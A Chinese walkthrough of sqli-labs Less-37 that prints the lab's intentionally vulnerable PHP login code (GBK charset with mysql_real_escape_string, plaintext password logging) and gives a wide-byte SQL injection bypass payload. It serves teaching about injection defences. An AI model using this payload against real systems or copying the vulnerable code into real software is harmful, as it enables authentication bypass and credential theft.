Less-37
查看一下源代码:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>Less-37- MySQL_real_escape_string</title> </head> <body bgcolor="#000000"> <div style=" margin-top:20px;color:#FFF; font-size:24px; text-align:center"> Welcome <font color="#FF0000"> Dhakkan </font><br></div> <div align="center" style="margin:40px 0px 0px 520px;border:20px; background-color:#0CF; text-align:center; width:400px; height:150px;"> <div style="padding-top:10px; font-size:15px;"> <!--Form to post the data for sql injections Error based SQL Injection--> <form action="" name="form1" method="post"> <div style="margin-top:15px; height:30px;">Username : <input type="text" name="uname" value=""/> </div> <div> Password : <input type="text" name="passwd" value=""/> </div></br> <div style=" margin-top:9px;margin-left:90px;"> <input type="submit" name="submit" value="Submit" /> </div> </form> </div> </div> <div style=" margin-top:10px;color:#FFF; font-size:23px; text-align:center"> <font size="3" color="#FFFF00"> <center> <br> <br> <br> <img src="../images/Less-37.jpg" /> </center> <?php //including the Mysql connect parameters. include("../sql-connections/sql-connect.php"); // take the variables if(isset($_POST['uname']) && isset($_POST['passwd'])) { $uname1=$_POST['uname']; $passwd1=$_POST['passwd']; //echo "username before addslashes is :".$uname1 ."<br>"; //echo "Input password before addslashes is : ".$passwd1. "<br>"; //logging the connection parameters to a file for analysis. $fp=fopen('result.txt','a'); fwrite($fp,'User Name:'.$uname1); fwrite($fp,'Password:'.$passwd1."\n"); fclose($fp); $uname = mysql_real_escape_string($uname1); $passwd= mysql_real_escape_string($passwd1); //echo "username after addslashes is :".$uname ."<br>"; //echo "Input password after addslashes is : ".$passwd; // connectivity mysql_query("SET NAMES gbk"); @$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1"; $result=mysql_query($sql); $row = mysql_fetch_array($result); if($row) { //echo '<font color= "#0000ff">'; echo "<br>"; echo '<font color= "#FFFF00" font size = 4>'; //echo " You Have successfully logged in\n\n " ; echo '<font size="3" color="#0000ff">'; echo "<br>"; echo 'Your Login name:'. $row['username']; echo "<br>"; echo 'Your Password:' .$row['password']; echo "<br>"; echo "</font>"; echo "<br>"; echo "<br>"; echo '<img src="../images/flag.jpg" />'; echo "</font>"; } else { echo '<font color= "#0000ff" font size="3">'; //echo "Try again looser"; print_r(mysql_error()); echo "</br>"; echo "</br>"; echo "</br>"; echo '<img src="../images/slap.jpg" />'; echo "</font>"; } } ?> </br> </br> </br> <font size='4' color= "#33FFFF"> <?php echo "Hint: The Username you input is escaped as : ".$uname ."<br>"; echo "Hint: The Password you input is escaped as : ".$passwd ."<br>"; ?> </font> </div> </body> </html>
过滤函数:
$uname = mysql_real_escape_string($uname1); $passwd= mysql_real_escape_string($passwd1);sql语句:
@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
根据以上过滤函数以及SQL语句,我们直接使用之前所用过的万能密码来突破一下:
username:�' or 1=1#
password:aaa
小结:对于过滤'\常用的三种方式是replace、addslashes、mysql_real_escape_string()。但是这三种方式仅仅依靠一个函数是不能完全防御的,我们在编写代码的时候需要更加的严谨。